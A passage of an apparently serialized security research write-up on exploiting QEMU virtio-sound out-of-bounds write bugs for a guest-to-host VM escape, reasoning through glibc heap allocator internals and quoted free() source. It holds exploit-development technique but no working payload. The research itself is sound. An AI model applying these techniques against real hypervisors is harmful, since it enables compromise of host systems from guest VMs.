}," cpu_to_le32",{"type":28,"tag":116,"props":125730,"children":125731},{"style":266},[125732],{"type":33,"value":125733},"(VIRTIO_SND_S_OK);\n",{"type":28,"tag":116,"props":125735,"children":125736},{"class":245,"line":1137},[125737],{"type":28,"tag":116,"props":125738,"children":125739},{"style":266},[125740],{"type":33,"value":406},{"type":28,"tag":29,"props":125742,"children":125743},{},[125744,125746,125751,125753,125759,125761,125766,125768,125773,125775,125781,125782,125787],{"type":33,"value":125745},"Among the guest-controlled PCM parameters, format matters later for exploit reliability. For 8-bit PCM, QEMU accepts both unsigned (",{"type":28,"tag":98,"props":125747,"children":125749},{"className":125748},[],[125750],{"type":33,"value":3091},{"type":33,"value":125752},") and signed (",{"type":28,"tag":98,"props":125754,"children":125756},{"className":125755},[],[125757],{"type":33,"value":125758},"s8",{"type":33,"value":125760},") samples. They encode the same waveform differently - silence is ",{"type":28,"tag":98,"props":125762,"children":125764},{"className":125763},[],[125765],{"type":33,"value":29095},{"type":33,"value":125767}," in ",{"type":28,"tag":98,"props":125769,"children":125771},{"className":125770},[],[125772],{"type":33,"value":3091},{"type":33,"value":125774},", but ",{"type":28,"tag":98,"props":125776,"children":125778},{"className":125777},[],[125779],{"type":33,"value":125780},"0x00",{"type":33,"value":125767},{"type":28,"tag":98,"props":125783,"children":125785},{"className":125784},[],[125786],{"type":33,"value":125758},{"type":33,"value":141},{"type":28,"tag":18457,"props":125789,"children":125790},{},[],{"type":28,"tag":29,"props":125792,"children":125793},{},[125794],{"type":33,"value":125795},"To summarize:",{"type":28,"tag":455,"props":125797,"children":125798},{},[125799,125818,125836],{"type":28,"tag":459,"props":125800,"children":125801},{},[125802,125804,125809,125811,125816],{"type":33,"value":125803},"an integer underflow in the ",{"type":28,"tag":98,"props":125805,"children":125807},{"className":125806},[],[125808],{"type":33,"value":123873},{"type":33,"value":125810}," calculation in ",{"type":28,"tag":98,"props":125812,"children":125814},{"className":125813},[],[125815],{"type":33,"value":123378},{"type":33,"value":125817},", resulting in an 8-byte (or less) under-allocation",{"type":28,"tag":459,"props":125819,"children":125820},{},[125821,125823,125828,125829,125834],{"type":33,"value":125822},"a mismatch in the ",{"type":28,"tag":98,"props":125824,"children":125826},{"className":125825},[],[125827],{"type":33,"value":125105},{"type":33,"value":125810},{"type":28,"tag":98,"props":125830,"children":125832},{"className":125831},[],[125833],{"type":33,"value":125203},{"type":33,"value":125835},", leading to at most 8-byte OOB write",{"type":28,"tag":459,"props":125837,"children":125838},{},[125839,125841,125846,125848,125853,125855,125860],{"type":33,"value":125840},"a missing bound in the ",{"type":28,"tag":98,"props":125842,"children":125844},{"className":125843},[],[125845],{"type":33,"value":123873},{"type":33,"value":125847}," passed to ",{"type":28,"tag":98,"props":125849,"children":125851},{"className":125850},[],[125852],{"type":33,"value":125223},{"type":33,"value":125854},", which does not take the actual buffer allocation size into account and can therefore lead to an OOB write of an arbitrary length, up to ",{"type":28,"tag":98,"props":125856,"children":125858},{"className":125857},[],[125859],{"type":33,"value":125246},{"type":33,"value":81907},{"type":28,"tag":29,"props":125862,"children":125863},{},[125864,125866,125871,125873,125878,125880,125886],{"type":33,"value":125865},"In our exploit, we focus on the third bug because it provides the largest overflow and therefore the most useful primitive. In practice, the actual write is still bounded by ",{"type":28,"tag":98,"props":125867,"children":125869},{"className":125868},[],[125870],{"type":33,"value":125246},{"type":33,"value":125872},", but in our setup with the ALSA backend, ",{"type":28,"tag":98,"props":125874,"children":125876},{"className":125875},[],[125877],{"type":33,"value":125246},{"type":33,"value":125879}," was consistently around ",{"type":28,"tag":98,"props":125881,"children":125883},{"className":125882},[],[125884],{"type":33,"value":125885},"4096",{"type":33,"value":141},{"type":28,"tag":29,"props":125888,"children":125889},{},[125890,125892,125899,125900,125907],{"type":33,"value":125891},"It is also worth noting that the timing here was particularly unlucky - these bugs had been present in QEMU for over two years, but they were fixed (",{"type":28,"tag":87,"props":125893,"children":125896},{"href":125894,"rel":125895},"https://github.com/qemu/qemu/commit/bcb53328aa70023f1405fade4e253e7f77567261",[91],[125897],{"type":33,"value":125898},"commit 1",{"type":33,"value":825},{"type":28,"tag":87,"props":125901,"children":125904},{"href":125902,"rel":125903},"https://github.com/qemu/qemu/commit/7994203bb1b83a6604f3ab00fe9598909bb66164",[91],[125905],{"type":33,"value":125906},"commit 2",{"type":33,"value":125908},") in the very same week that we independently found them while manually reviewing the code.",{"type":28,"tag":63,"props":125910,"children":125911},{"id":99722},[125912],{"type":33,"value":99725},{"type":28,"tag":29,"props":125914,"children":125915},{},[125916],{"type":33,"value":125917},"Each of these bugs is in the audio input path. Since that audio input comes from the host side, the bytes written out of bounds are not controlled by the guest and, from the exploit perspective, can be treated as effectively random.",{"type":28,"tag":29,"props":125919,"children":125920},{},[125921],{"type":33,"value":125922},"This gives an interesting challenge: how do you exploit an out-of-bounds write when you do not control the data being written?",{"type":28,"tag":75,"props":125924,"children":125926},{"id":125925},"achieving-a-better-primitive",[125927],{"type":33,"value":125928},"Achieving a Better Primitive",{"type":28,"tag":29,"props":125930,"children":125931},{},[125932],{"type":33,"value":125933},"The first idea that comes to mind is to target some kind of size or offset field. The goal is to make that field as small as possible initially, trigger the overflow, and rely on the corrupted bytes being larger than the original value. Such scenario would transform a weak primitive into a much more useful one, giving us a better starting point for the rest of the exploit.",{"type":28,"tag":29,"props":125935,"children":125936},{},[125937],{"type":33,"value":125938},"However, after searching QEMU for such objects we didn't find a suitable target. The main problem was that, in most cases, the field we wanted to corrupt was preceded by one or more pointers. That would have been acceptable if those pointers were unused, but in every candidate object we examined they were still live. As a result, the heap overflow would corrupt them with effectively random bytes, causing an invalid dereference and crashing QEMU before we could achieve our desired guest-to-host escape.",{"type":28,"tag":29,"props":125940,"children":125941},{},[125942],{"type":33,"value":125943},"At that point, we turned our attention to the glibc allocator. This is usually not the first choice in such targets - allocator techniques are often more version-specific and less portable than program-specific primitives (for example, type confusion on known object layouts). So allocator attacks are often a fallback once object-level paths are exhausted.",{"type":28,"tag":443,"props":125945,"children":125947},{"id":125946},"glibc-allocator",[125948],{"type":33,"value":125949},"Glibc Allocator",{"type":28,"tag":29,"props":125951,"children":125952},{},[125953,125955,125962],{"type":33,"value":125954},"The glibc allocator has already been studied and documented extensively, so we will only cover the basics relevant to this exploit. A good resource for both current and older attack techniques is ",{"type":28,"tag":87,"props":125956,"children":125959},{"href":125957,"rel":125958},"https://github.com/shellphish/how2heap",[91],[125960],{"type":33,"value":125961},"how2heap",{"type":33,"value":141},{"type":28,"tag":36970,"props":125964,"children":125966},{"id":125965},"chunk-layout-and-bins",[125967],{"type":33,"value":125968},"Chunk Layout and Bins",{"type":28,"tag":29,"props":125970,"children":125971},{},[125972],{"type":33,"value":125973},"A chunk looks like this:",{"type":28,"tag":234,"props":125975,"children":125977},{"code":125976},"       +0x0          +0x8\n      +-------------+-------------+\n      |  prev_size  |    size     |\n      +---------------------------+\n+0x10 |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |           . . .           |\n",[125978],{"type":28,"tag":98,"props":125979,"children":125980},{"__ignoreMap":7},[125981],{"type":33,"value":125976},{"type":28,"tag":29,"props":125983,"children":125984},{},[125985,125987,125993,125995,126001,126002,126007,126008,126014,126016,126021,126023,126028,126030,126036,126037,126043,126045,126051],{"type":33,"value":125986},"The first 16 bytes form the chunk header. It consists of the ",{"type":28,"tag":98,"props":125988,"children":125990},{"className":125989},[],[125991],{"type":33,"value":125992},"prev_size",{"type":33,"value":125994}," field at offset ",{"type":28,"tag":98,"props":125996,"children":125998},{"className":125997},[],[125999],{"type":33,"value":126000},"0x0",{"type":33,"value":37173},{"type":28,"tag":98,"props":126003,"children":126005},{"className":126004},[],[126006],{"type":33,"value":123873},{"type":33,"value":125994},{"type":28,"tag":98,"props":126009,"children":126011},{"className":126010},[],[126012],{"type":33,"value":126013},"0x8",{"type":33,"value":126015},". As the name suggests, ",{"type":28,"tag":98,"props":126017,"children":126019},{"className":126018},[],[126020],{"type":33,"value":125992},{"type":33,"value":126022}," stores the size of the previous chunk and is only used when that chunk is free, while ",{"type":28,"tag":98,"props":126024,"children":126026},{"className":126025},[],[126027],{"type":33,"value":123873},{"type":33,"value":126029}," stores the size of the current chunk and three special bits of which ",{"type":28,"tag":98,"props":126031,"children":126033},{"className":126032},[],[126034],{"type":33,"value":126035},"PREV_INUSE",{"type":33,"value":10659},{"type":28,"tag":98,"props":126038,"children":126040},{"className":126039},[],[126041],{"type":33,"value":126042},"IS_MMAPPED",{"type":33,"value":126044}," are relevant for this blog post. The actual chunk data begins at offset ",{"type":28,"tag":98,"props":126046,"children":126048},{"className":126047},[],[126049],{"type":33,"value":126050},"0x10",{"type":33,"value":141},{"type":28,"tag":29,"props":126053,"children":126054},{},[126055],{"type":33,"value":126056},"Freed chunks are organized into different bins depending on their size and state. For this writeup, the important one is the per-thread cache, or tcache. Tcache stores recently freed chunks in size-segregated singly linked lists and is generally the first place glibc looks when servicing small allocations.",{"type":28,"tag":36970,"props":126058,"children":126060},{"id":126059},"free-path",[126061],{"type":33,"value":126062},"free() path",{"type":28,"tag":29,"props":126064,"children":126065},{},[126066,126068,126074],{"type":33,"value":126067},"Let’s first look at the ",{"type":28,"tag":98,"props":126069,"children":126071},{"className":126070},[],[126072],{"type":33,"value":126073},"free()",{"type":33,"value":126075}," path in glibc 2.40:",{"type":28,"tag":234,"props":126077,"children":126079},{"code":126078,"language":1797,"meta":7,"className":16176,"style":7},"__libc_free (void *mem)\n{\n  mstate ar_ptr;\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n  if (chunk_is_mmapped (p))\n    {\n      munmap_chunk (p);\n    }\n  else\n    {\n      MAYBE_INIT_TCACHE ();\n\n      ar_ptr = arena_for_chunk (p);\n      _int_free (ar_ptr, p, 0);\n    }\n}\n",[126080],{"type":28,"tag":98,"props":126081,"children":126082},{"__ignoreMap":7},[126083,126111,126118,126126,126134,126141,126163,126184,126191,126204,126211,126219,126226,126239,126246,126267,126288,126295],{"type":28,"tag":116,"props":126084,"children":126085},{"class":245,"line":246},[126086,126091,126095,126099,126103,126107],{"type":28,"tag":116,"props":126087,"children":126088},{"style":282},[126089],{"type":33,"value":126090},"__libc_free",{"type":28,"tag":116,"props":126092,"children":126093},{"style":266},[126094],{"type":33,"value":269},{"type":28,"tag":116,"props":126096,"children":126097},{"style":376},[126098],{"type":33,"value":51245},{"type":28,"tag":116,"props":126100,"children":126101},{"style":370},[126102],{"type":33,"value":9484},{"type":28,"tag":116,"props":126104,"children":126105},{"style":272},[126106],{"type":33,"value":40284},{"type":28,"tag":116,"props":126108,"children":126109},{"style":266},[126110],{"type":33,"value":2830},{"type":28,"tag":116,"props":126112,"children":126113},{"class":245,"line":256},[126114],{"type":28,"tag":116,"props":126115,"children":126116},{"style":266},[126117],{"type":33,"value":10547},{"type":28,"tag":116,"props":126119,"children":126120},{"class":245,"line":293},[126121],{"type":28,"tag":116,"props":126122,"children":126123},{"style":266},[126124],{"type":33,"value":126125},"  mstate ar_ptr;\n",{"type":28,"tag":116,"props":126127,"children":126128},{"class":245,"line":361},[126129],{"type":28,"tag":116,"props":126130,"children":126131},{"style":266},[126132],{"type":33,"value":126133},"  mchunkptr p;\n",{"type":28,"tag":116,"props":126135,"children":126136},{"class":245,"line":387},[126137],{"type":28,"tag":116,"props":126138,"children":126139},{"emptyLinePlaceholder":19},[126140],{"type":33,"value":1044},{"type":28,"tag":116,"props":126142,"children":126143},{"class":245,"line":400},[126144,126149,126153,126158],{"type":28,"tag":116,"props":126145,"children":126146},{"style":266},[126147],{"type":33,"value":126148},"  p ",{"type":28,"tag":116,"props":126150,"children":126151},{"style":370},[126152],{"type":33,"value":373},{"type":28,"tag":116,"props":126154,"children":126155},{"style":282},[126156],{"type":33,"value":126157}," mem2chunk",{"type":28,"tag":116,"props":126159,"children":126160},{"style":266},[126161],{"type":33,"value":126162}," (mem);\n",{"type":28,"tag":116,"props":126164,"children":126165},{"class":245,"line":614},[126166,126170,126174,126179],{"type":28,"tag":116,"props":126167,"children":126168},{"style":260},[126169],{"type":33,"value":31045},{"type":28,"tag":116,"props":126171,"children":126172},{"style":266},[126173],{"type":33,"value":269},{"type":28,"tag":116,"props":126175,"children":126176},{"style":282},[126177],{"type":33,"value":126178},"chunk_is_mmapped",{"type":28,"tag":116,"props":126180,"children":126181},{"style":266},[126182],{"type":33,"value":126183}," (p))\n",{"type":28,"tag":116,"props":126185,"children":126186},{"class":245,"line":631},[126187],{"type":28,"tag":116,"props":126188,"children":126189},{"style":266},[126190],{"type":33,"value":28842},{"type":28,"tag":116,"props":126192,"children":126193},{"class":245,"line":665},[126194,126199],{"type":28,"tag":116,"props":126195,"children":126196},{"style":282},[126197],{"type":33,"value":126198},"      munmap_chunk",{"type":28,"tag":116,"props":126200,"children":126201},{"style":266},[126202],{"type":33,"value":126203}," (p);\n",{"type":28,"tag":116,"props":126205,"children":126206},{"class":245,"line":713},[126207],{"type":28,"tag":116,"props":126208,"children":126209},{"style":266},[126210],{"type":33,"value":3025},{"type":28,"tag":116,"props":126212,"children":126213},{"class":245,"line":750},[126214],{"type":28,"tag":116,"props":126215,"children":126216},{"style":260},[126217],{"type":33,"value":126218},"  else\n",{"type":28,"tag":116,"props":126220,"children":126221},{"class":245,"line":779},[126222],{"type":28,"tag":116,"props":126223,"children":126224},{"style":266},[126225],{"type":33,"value":28842},{"type":28,"tag":116,"props":126227,"children":126228},{"class":245,"line":796},[126229,126234],{"type":28,"tag":116,"props":126230,"children":126231},{"style":282},[126232],{"type":33,"value":126233},"      MAYBE_INIT_TCACHE",{"type":28,"tag":116,"props":126235,"children":126236},{"style":266},[126237],{"type":33,"value":126238}," ();\n",{"type":28,"tag":116,"props":126240,"children":126241},{"class":245,"line":847},[126242],{"type":28,"tag":116,"props":126243,"children":126244},{"emptyLinePlaceholder":19},[126245],{"type":33,"value":1044},{"type":28,"tag":116,"props":126247,"children":126248},{"class":245,"line":898},[126249,126254,126258,126263],{"type":28,"tag":116,"props":126250,"children":126251},{"style":266},[126252],{"type":33,"value":126253},"      ar_ptr ",{"type":28,"tag":116,"props":126255,"children":126256},{"style":370},[126257],{"type":33,"value":373},{"type":28,"tag":116,"props":126259,"children":126260},{"style":282},[126261],{"type":33,"value":126262}," arena_for_chunk",{"type":28,"tag":116,"props":126264,"children":126265},{"style":266},[126266],{"type":33,"value":126203},{"type":28,"tag":116,"props":126268,"children":126269},{"class":245,"line":907},[126270,126275,126280,126284],{"type":28,"tag":116,"props":126271,"children":126272},{"style":282},[126273],{"type":33,"value":126274},"      _int_free",{"type":28,"tag":116,"props":126276,"children":126277},{"style":266},[126278],{"type":33,"value":126279}," (ar_ptr, p, ",{"type":28,"tag":116,"props":126281,"children":126282},{"style":350},[126283],{"type":33,"value":353},{"type":28,"tag":116,"props":126285,"children":126286},{"style":266},[126287],{"type":33,"value":895},{"type":28,"tag":116,"props":126289,"children":126290},{"class":245,"line":981},[126291],{"type":28,"tag":116,"props":126292,"children":126293},{"style":266},[126294],{"type":33,"value":3025},{"type":28,"tag":116,"props":126296,"children":126297},{"class":245,"line":1011},[126298],{"type":28,"tag":116,"props":126299,"children":126300},{"style":266},[126301],{"type":33,"value":406},{"type":28,"tag":29,"props":126303,"children":126304},{},[126305,126307,126312,126314,126319,126321,126327,126329,126335,126337,126342,126344,126349,126351,126356,126358,126363],{"type":33,"value":126306},"We can see that if the ",{"type":28,"tag":98,"props":126308,"children":126310},{"className":126309},[],[126311],{"type":33,"value":126042},{"type":33,"value":126313}," bit is set in the corrupted ",{"type":28,"tag":98,"props":126315,"children":126317},{"className":126316},[],[126318],{"type":33,"value":123873},{"type":33,"value":126320}," field, glibc will call ",{"type":28,"tag":98,"props":126322,"children":126324},{"className":126323},[],[126325],{"type":33,"value":126326},"munmap_chunk",{"type":33,"value":126328},", which internally checks that ",{"type":28,"tag":98,"props":126330,"children":126332},{"className":126331},[],[126333],{"type":33,"value":126334},"prev_size + size",{"type":33,"value":126336}," is page-aligned. To reach the ",{"type":28,"tag":98,"props":126338,"children":126340},{"className":126339},[],[126341],{"type":33,"value":123873},{"type":33,"value":126343}," field, we first have to overwrite the entire 8-byte ",{"type":28,"tag":98,"props":126345,"children":126347},{"className":126346},[],[126348],{"type":33,"value":125992},{"type":33,"value":126350}," field with uncontrolled data. The chance that a corrupted ",{"type":28,"tag":98,"props":126352,"children":126354},{"className":126353},[],[126355],{"type":33,"value":126334},{"type":33,"value":126357}," value still ends up page-aligned is extremely small. In practice, if ",{"type":28,"tag":98,"props":126359,"children":126361},{"className":126360},[],[126362],{"type":33,"value":126042},{"type":33,"value":126364}," is set, the process will almost certainly abort before we can make use of the corruption.",{"type":28,"tag":29,"props":126366,"children":126367},{},[126368,126370,126375,126377,126383],{"type":33,"value":126369},"Assuming ",{"type":28,"tag":98,"props":126371,"children":126373},{"className":126372},[],[126374],{"type":33,"value":126042},{"type":33,"value":126376}," is not set, execution continues into ",{"type":28,"tag":98,"props":126378,"children":126380},{"className":126379},[],[126381],{"type":33,"value":126382},"_int_free",{"type":33,"value":4160},{"type":28,"tag":234,"props":126385,"children":126387},{"code":126386,"language":1797,"meta":7,"className":16176,"style":7},"static void\n_int_free (mstate av, mchunkptr p, int have_lock)\n{\n  INTERNAL_SIZE_T size;\n\n  size = chunksize (p);\n\n  /* Little security check which won't hurt performance: the\n     allocator never wraps around at the end of the address space.\n     Therefore we can exclude some size values which might appear\n     here by accident or by \"design\" from some intruder.  */\n  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)\n      || __builtin_expect (misaligned_chunk (p), 0))\n    malloc_printerr (\"free(): invalid pointer\");\n  /* We know that each chunk is at least MINSIZE bytes in size or a\n     multiple of MALLOC_ALIGNMENT.  */\n  if (__glibc_unlikely (size \u003C MINSIZE || !aligned_OK (size)))\n    malloc_printerr (\"free(): invalid size\");\n\n  check_inuse_chunk(av, p);\n\n  [...]\n",[126388],{"type":28,"tag":98,"props":126389,"children":126390},{"__ignoreMap":7},[126391,126403,126446,126453,126461,126468,126489,126496,126504,126512,126520,126528,126592,126627,126648,126656,126664,126712,126732,126739,126752,126759],{"type":28,"tag":116,"props":126392,"children":126393},{"class":245,"line":246},[126394,126398],{"type":28,"tag":116,"props":126395,"children":126396},{"style":376},[126397],{"type":33,"value":50664},{"type":28,"tag":116,"props":126399,"children":126400},{"style":376},[126401],{"type":33,"value":126402}," void\n",{"type":28,"tag":116,"props":126404,"children":126405},{"class":245,"line":256},[126406,126410,126415,126420,126425,126429,126433,126437,126442],{"type":28,"tag":116,"props":126407,"children":126408},{"style":282},[126409],{"type":33,"value":126382},{"type":28,"tag":116,"props":126411,"children":126412},{"style":266},[126413],{"type":33,"value":126414}," (mstate ",{"type":28,"tag":116,"props":126416,"children":126417},{"style":272},[126418],{"type":33,"value":126419},"av",{"type":28,"tag":116,"props":126421,"children":126422},{"style":266},[126423],{"type":33,"value":126424},", mchunkptr ",{"type":28,"tag":116,"props":126426,"children":126427},{"style":272},[126428],{"type":33,"value":29},{"type":28,"tag":116,"props":126430,"children":126431},{"style":266},[126432],{"type":33,"value":825},{"type":28,"tag":116,"props":126434,"children":126435},{"style":376},[126436],{"type":33,"value":18710},{"type":28,"tag":116,"props":126438,"children":126439},{"style":272},[126440],{"type":33,"value":126441}," have_lock",{"type":28,"tag":116,"props":126443,"children":126444},{"style":266},[126445],{"type":33,"value":2830},{"type":28,"tag":116,"props":126447,"children":126448},{"class":245,"line":293},[126449],{"type":28,"tag":116,"props":126450,"children":126451},{"style":266},[126452],{"type":33,"value":10547},{"type":28,"tag":116,"props":126454,"children":126455},{"class":245,"line":361},[126456],{"type":28,"tag":116,"props":126457,"children":126458},{"style":266},[126459],{"type":33,"value":126460},"  INTERNAL_SIZE_T size;\n",{"type":28,"tag":116,"props":126462,"children":126463},{"class":245,"line":387},[126464],{"type":28,"tag":116,"props":126465,"children":126466},{"emptyLinePlaceholder":19},[126467],{"type":33,"value":1044},{"type":28,"tag":116,"props":126469,"children":126470},{"class":245,"line":400},[126471,126476,126480,126485],{"type":28,"tag":116,"props":126472,"children":126473},{"style":266},[126474],{"type":33,"value":126475},"  size ",{"type":28,"tag":116,"props":126477,"children":126478},{"style":370},[126479],{"type":33,"value":373},{"type":28,"tag":116,"props":126481,"children":126482},{"style":282},[126483],{"type":33,"value":126484}," chunksize",{"type":28,"tag":116,"props":126486,"children":126487},{"style":266},[126488],{"type":33,"value":126203},{"type":28,"tag":116,"props":126490,"children":126491},{"class":245,"line":614},[126492],{"type":28,"tag":116,"props":126493,"children":126494},{"emptyLinePlaceholder":19},[126495],{"type":33,"value":1044},{"type":28,"tag":116,"props":126497,"children":126498},{"class":245,"line":631},[126499],{"type":28,"tag":116,"props":126500,"children":126501},{"style":250},[126502],{"type":33,"value":126503},"  /* Little security check which won't hurt performance: the\n",{"type":28,"tag":116,"props":126505,"children":126506},{"class":245,"line":665},[126507],{"type":28,"tag":116,"props":126508,"children":126509},{"style":250},[126510],{"type":33,"value":126511},"     allocator never wraps around at the end of the address space.\n",{"type":28,"tag":116,"props":126513,"children":126514},{"class":245,"line":713},[126515],{"type":28,"tag":116,"props":126516,"children":126517},{"style":250},[126518],{"type":33,"value":126519},"     Therefore we can exclude some size values which might appear\n",{"type":28,"tag":116,"props":126521,"children":126522},{"class":245,"line":750},[126523],{"type":28,"tag":116,"props":126524,"children":126525},{"style":250},[126526],{"type":33,"value":126527},"     here by accident or by \"design\" from some intruder.  */\n",{"type":28,"tag":116,"props":126529,"children":126530},{"class":245,"line":779},[126531,126535,126539,126544,126549,126554,126559,126563,126567,126571,126575,126579,126584,126588],{"type":28,"tag":116,"props":126532,"children":126533},{"style":260},[126534],{"type":33,"value":31045},{"type":28,"tag":116,"props":126536,"children":126537},{"style":266},[126538],{"type":33,"value":269},{"type":28,"tag":116,"props":126540,"children":126541},{"style":282},[126542],{"type":33,"value":126543},"__builtin_expect",{"type":28,"tag":116,"props":126545,"children":126546},{"style":266},[126547],{"type":33,"value":126548}," ((",{"type":28,"tag":116,"props":126550,"children":126551},{"style":376},[126552],{"type":33,"value":126553},"uintptr_t",{"type":28,"tag":116,"props":126555,"children":126556},{"style":266},[126557],{"type":33,"value":126558},") p ",{"type":28,"tag":116,"props":126560,"children":126561},{"style":370},[126562],{"type":33,"value":645},{"type":28,"tag":116,"props":126564,"children":126565},{"style":266},[126566],{"type":33,"value":269},{"type":28,"tag":116,"props":126568,"children":126569},{"style":376},[126570],{"type":33,"value":126553},{"type":28,"tag":116,"props":126572,"children":126573},{"style":266},[126574],{"type":33,"value":1609},{"type":28,"tag":116,"props":126576,"children":126577},{"style":370},[126578],{"type":33,"value":3996},{"type":28,"tag":116,"props":126580,"children":126581},{"style":266},[126582],{"type":33,"value":126583},"size, ",{"type":28,"tag":116,"props":126585,"children":126586},{"style":350},[126587],{"type":33,"value":353},{"type":28,"tag":116,"props":126589,"children":126590},{"style":266},[126591],{"type":33,"value":2830},{"type":28,"tag":116,"props":126593,"children":126594},{"class":245,"line":796},[126595,126600,126605,126609,126614,126619,126623],{"type":28,"tag":116,"props":126596,"children":126597},{"style":370},[126598],{"type":33,"value":126599},"      ||",{"type":28,"tag":116,"props":126601,"children":126602},{"style":282},[126603],{"type":33,"value":126604}," __builtin_expect",{"type":28,"tag":116,"props":126606,"children":126607},{"style":266},[126608],{"type":33,"value":269},{"type":28,"tag":116,"props":126610,"children":126611},{"style":282},[126612],{"type":33,"value":126613},"misaligned_chunk",{"type":28,"tag":116,"props":126615,"children":126616},{"style":266},[126617],{"type":33,"value":126618}," (p), ",{"type":28,"tag":116,"props":126620,"children":126621},{"style":350},[126622],{"type":33,"value":353},{"type":28,"tag":116,"props":126624,"children":126625},{"style":266},[126626],{"type":33,"value":19376},{"type":28,"tag":116,"props":126628,"children":126629},{"class":245,"line":847},[126630,126635,126639,126644],{"type":28,"tag":116,"props":126631,"children":126632},{"style":282},[126633],{"type":33,"value":126634},"    malloc_printerr",{"type":28,"tag":116,"props":126636,"children":126637},{"style":266},[126638],{"type":33,"value":269},{"type":28,"tag":116,"props":126640,"children":126641},{"style":563},[126642],{"type":33,"value":126643},"\"free(): invalid pointer\"",{"type":28,"tag":116,"props":126645,"children":126646},{"style":266},[126647],{"type":33,"value":895},{"type":28,"tag":116,"props":126649,"children":126650},{"class":245,"line":898},[126651],{"type":28,"tag":116,"props":126652,"children":126653},{"style":250},[126654],{"type":33,"value":126655},"  /* We know that each chunk is at least MINSIZE bytes in size or a\n",{"type":28,"tag":116,"props":126657,"children":126658},{"class":245,"line":907},[126659],{"type":28,"tag":116,"props":126660,"children":126661},{"style":250},[126662],{"type":33,"value":126663},"     multiple of MALLOC_ALIGNMENT.  */\n",{"type":28,"tag":116,"props":126665,"children":126666},{"class":245,"line":981},[126667,126671,126675,126680,126685,126689,126694,126698,126702,126707],{"type":28,"tag":116,"props":126668,"children":126669},{"style":260},[126670],{"type":33,"value":31045},{"type":28,"tag":116,"props":126672,"children":126673},{"style":266},[126674],{"type":33,"value":269},{"type":28,"tag":116,"props":126676,"children":126677},{"style":282},[126678],{"type":33,"value":126679},"__glibc_unlikely",{"type":28,"tag":116,"props":126681,"children":126682},{"style":266},[126683],{"type":33,"value":126684}," (size ",{"type":28,"tag":116,"props":126686,"children":126687},{"style":370},[126688],{"type":33,"value":514},{"type":28,"tag":116,"props":126690,"children":126691},{"style":266},[126692],{"type":33,"value":126693}," MINSIZE ",{"type":28,"tag":116,"props":126695,"children":126696},{"style":370},[126697],{"type":33,"value":22081},{"type":28,"tag":116,"props":126699,"children":126700},{"style":370},[126701],{"type":33,"value":12530},{"type":28,"tag":116,"props":126703,"children":126704},{"style":282},[126705],{"type":33,"value":126706},"aligned_OK",{"type":28,"tag":116,"props":126708,"children":126709},{"style":266},[126710],{"type":33,"value":126711}," (size)))\n",{"type":28,"tag":116,"props":126713,"children":126714},{"class":245,"line":1011},[126715,126719,126723,126728],{"type":28,"tag":116,"props":126716,"children":126717},{"style":282},[126718],{"type":33,"value":126634},{"type":28,"tag":116,"props":126720,"children":126721},{"style":266},[126722],{"type":33,"value":269},{"type":28,"tag":116,"props":126724,"children":126725},{"style":563},[126726],{"type":33,"value":126727},"\"free(): invalid size\"",{"type":28,"tag":116,"props":126729,"children":126730},{"style":266},[126731],{"type":33,"value":895},{"type":28,"tag":116,"props":126733,"children":126734},{"class":245,"line":1029},[126735],{"type":28,"tag":116,"props":126736,"children":126737},{"emptyLinePlaceholder":19},[126738],{"type":33,"value":1044},{"type":28,"tag":116,"props":126740,"children":126741},{"class":245,"line":1038},[126742,126747],{"type":28,"tag":116,"props":126743,"children":126744},{"style":282},[126745],{"type":33,"value":126746},"  check_inuse_chunk",{"type":28,"tag":116,"props":126748,"children":126749},{"style":266},[126750],{"type":33,"value":126751},"(av, p);\n",{"type":28,"tag":116,"props":126753,"children":126754},{"class":245,"line":1047},[126755],{"type":28,"tag":116,"props":126756,"children":126757},{"emptyLinePlaceholder":19},[126758],{"type":33,"value":1044},{"type":28,"tag":116,"props":126760,"children":126761},{"class":245,"line":1071},[126762],{"type":28,"tag":116,"props":126763,"children":126764},{"style":266},[126765],{"type":33,"value":126766},"  [...]\n",{"type":28,"tag":29,"props":126768,"children":126769},{},[126770],{"type":33,"value":126771},"The first check verifies that the chunk pointer itself is not misaligned. Since we do not control the pointer, this is not particularly relevant here.",{"type":28,"tag":29,"props":126773,"children":126774},{},[126775,126777,126782,126784,126789,126791,126796,126798,126803],{"type":33,"value":126776},"The next check, however, ensures that the ",{"type":28,"tag":98,"props":126778,"children":126780},{"className":126779},[],[126781],{"type":33,"value":123873},{"type":33,"value":126783}," field is 16-byte aligned. This means that the low byte we overwrite in ",{"type":28,"tag":98,"props":126785,"children":126787},{"className":126786},[],[126788],{"type":33,"value":123873},{"type":33,"value":126790}," must preserve alignment while also avoiding the ",{"type":28,"tag":98,"props":126792,"children":126794},{"className":126793},[],[126795],{"type":33,"value":126042},{"type":33,"value":126797}," bit. Under those constraints, exploiting the bug through ",{"type":28,"tag":98,"props":126799,"children":126801},{"className":126800},[],[126802],{"type":33,"value":123873},{"type":33,"value":126804}," corruption looked very unreliable at first.",{"type":28,"tag":29,"props":126806,"children":126807},{},[126808],{"type":33,"value":126809},"Still, we wanted to check how this behaved in the latest glibc 2.43:",{"type":28,"tag":234,"props":126811,"children":126813},{"code":126812,"language":1797,"meta":7,"className":16176,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes))\n    {\n      [...]\n\n      return tcache_put (p, tc_idx);\n    